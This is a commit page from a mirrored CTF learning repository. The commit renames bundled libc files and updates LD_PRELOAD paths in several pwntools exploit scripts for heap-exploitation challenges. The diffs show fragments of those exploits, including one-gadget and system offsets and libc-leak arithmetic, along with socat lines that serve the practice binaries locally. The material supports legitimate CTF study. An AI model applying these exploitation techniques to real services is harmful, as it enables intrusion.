nganhkhoa/CTF-All-In-One
1
0
Fork 0
mirror of https://github.com/nganhkhoa/CTF-All-In-One.git synced 2025-06-24 04:05:03 +07:00
Code Issues Projects Releases Wiki Activity

fix

Browse Source
This commit is contained in:
firmianay
2018-06-07 17:23:45 +08:00
parent 6301bcc4f8
commit 77551e0470
47 changed files with 146 additions and 99 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
src/writeup/6.1.16_pwn_hitbctf2017_1000levels/exp.py
View File

@ -3,7 +3,7 @@
from pwn import *
#context.log_level = 'debug'
io = process(['./1000levels'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./1000levels'], env={'LD_PRELOAD':'./libc-2.23.so'})
one_gadget = 0x4526a
system_offset = 0x45390

0
src/writeup/6.1.16_pwn_hitbctf2017_1000levels/libc.so.6 → src/writeup/6.1.16_pwn_hitbctf2017_1000levels/libc-2.23.so
View File

4
src/writeup/6.1.18_pwn_hitbctf2017_sentosa/exp.py
View File

@ -4,8 +4,8 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./sentosa'], env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF('libc.so.6')
io = process(['./sentosa'], env={'LD_PRELOAD':'./libc-2.23.so'})
libc = ELF('libc-2.23.so')
def start_proj(length, name, price, area, capacity):
io.sendlineafter("Exit\n", '1')

0
src/writeup/6.1.18_pwn_hitbctf2017_sentosa/libc.so.6 → src/writeup/6.1.18_pwn_hitbctf2017_sentosa/libc-2.23.so
View File

4
src/writeup/6.1.19_pwn_hitbctf2018_gundam/exp.py
View File

@ -4,9 +4,9 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./gundam'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./gundam'], env={'LD_PRELOAD':'./libc-2.26.so'})
#elf = ELF('gundam')
libc = ELF('libc.so.6')
libc = ELF('libc-2.26.so')
def build(name):
io.sendlineafter("choice : ", '1')

0
src/writeup/6.1.19_pwn_hitbctf2018_gundam/libc.so.6 → src/writeup/6.1.19_pwn_hitbctf2018_gundam/libc-2.26.so
View File

4
src/writeup/6.1.21_pwn_hitconctf2016_secret_holder/exp.py
View File

@ -4,9 +4,9 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./SecretHolder'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./SecretHolder'], env={'LD_PRELOAD':'./libc-2.23.so'})
elf = ELF('SecretHolder')
libc = ELF('libc.so.6')
libc = ELF('libc-2.23.so')
small_ptr = 0x006020b0
big_ptr = 0x006020a0

0
src/writeup/6.1.21_pwn_hitconctf2016_secret_holder/libc.so.6 → src/writeup/6.1.21_pwn_hitconctf2016_secret_holder/libc-2.23.so
View File

4
src/writeup/6.1.22_pwn_hitconctf2016_sleepy_holder/exp.py
View File

@ -4,9 +4,9 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./SleepyHolder'], env={'LD_PRELOAD':'./libc.so.6'})
io = process(['./SleepyHolder'], env={'LD_PRELOAD':'./libc-2.23.so'})
elf = ELF('SleepyHolder')
libc = ELF('libc.so.6')
libc = ELF('libc-2.23.so')
small_ptr = 0x006020d0
big_ptr = 0x006020c0

0
src/writeup/6.1.22_pwn_hitconctf2016_sleepy_holder/libc.so.6 → src/writeup/6.1.22_pwn_hitconctf2016_sleepy_holder/libc-2.23.so
View File

4
src/writeup/6.1.24_hitconctf2016_house_of_orange/exp.py
View File

@ -4,8 +4,8 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./houseoforange'], env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF('libc.so.6')
io = process(['./houseoforange'], env={'LD_PRELOAD':'./libc-2.23.so'})
libc = ELF('libc-2.23.so')
def build(size, name):
io.sendlineafter("Your choice : ", '1')

0
src/writeup/6.1.24_hitconctf2016_house_of_orange/libc.so.6 → src/writeup/6.1.24_hitconctf2016_house_of_orange/libc-2.23.so
View File

4
src/writeup/6.1.26_pwn_34c3ctf2017_300/exp.py
View File

@ -4,8 +4,8 @@ from pwn import *
#context.log_level = 'debug'
io = process(['./300'], env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF('libc.so.6')
io = process(['./300'], env={'LD_PRELOAD':'./libc-2.24.so'})
libc = ELF('libc-2.24.so')
def alloc(idx):
io.sendlineafter("free\n", '1')

0
src/writeup/6.1.26_pwn_34c3ctf2017_300/libc.so.6 → src/writeup/6.1.26_pwn_34c3ctf2017_300/libc-2.24.so
View File

0
src/writeup/6.1.28_pwn_asisctf2016_b00ks/libc.so.6 → src/writeup/6.1.28_pwn_asisctf2016_b00ks/libc-2.23.so
View File

0
src/writeup/6.1.30_pwn_hitconctf2017_ghost_in_the_heap/libc.so.6 → src/writeup/6.1.30_pwn_hitconctf2017_ghost_in_the_heap/libc-2.24.so
View File

BIN
src/writeup/6.1.31_pwn_hitbctf2018_mutepig/libc-2.23.so Executable file
View File

Binary file not shown.

BIN
src/writeup/6.1.31_pwn_hitbctf2018_mutepig/mutepig Executable file
View File

Binary file not shown.

4
src/writeup/6.1.7_pwn_0ctf2015_freenote/exp.py
View File

@ -2,9 +2,9 @@
from pwn import *
io = process(['./freenote'], env={'LD_PRELOAD':'./libc.so.6_1'})
io = process(['./freenote'], env={'LD_PRELOAD':'./libc-2.19.so'})
elf = ELF('freenote')
libc = ELF('libc.so.6_1')
libc = ELF('libc-2.19.so')
def newnote(x):
io.recvuntil("Your choice: ")

0
src/writeup/6.1.7_pwn_0ctf2015_freenote/libc.so.6_1 → src/writeup/6.1.7_pwn_0ctf2015_freenote/libc-2.19.so
View File

2
src/writeup/6.1.7_pwn_0ctf2015_freenote/run.sh
View File

@ -1 +1 @@
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc.so_1 ./freenote" &
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc-2.19.so ./freenote" &

2
src/writeup/6.1.9_pwn_rhme3_exploitation/exp.py
View File

@ -63,7 +63,7 @@ p.recvuntil('Name: ')
leak = u64(p.recv(6).ljust(8, '\x00'))
libc = leak - 0x3c4b78 # 0x3c4b78 = leak - libc
system = libc + 0x045390 # $ readelf -s libc.so.6 | grep system@
system = libc + 0x045390 # $ readelf -s libc-2.23.so | grep system@
log.info("leak => 0x%x" % leak)
log.info("libc => 0x%x" % libc)

0
src/writeup/6.1.9_pwn_rhme3_exploitation/libc.so.6 → src/writeup/6.1.9_pwn_rhme3_exploitation/libc-2.23.so
View File

2
src/writeup/6.1.9_pwn_rhme3_exploitation/run.sh
View File

@ -1 +1 @@
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc.so.6 ./main.elf" &
socat tcp4-listen:10001,reuseaddr,fork exec:"env LD_PRELOAD=./libc-2.23.so ./main.elf" &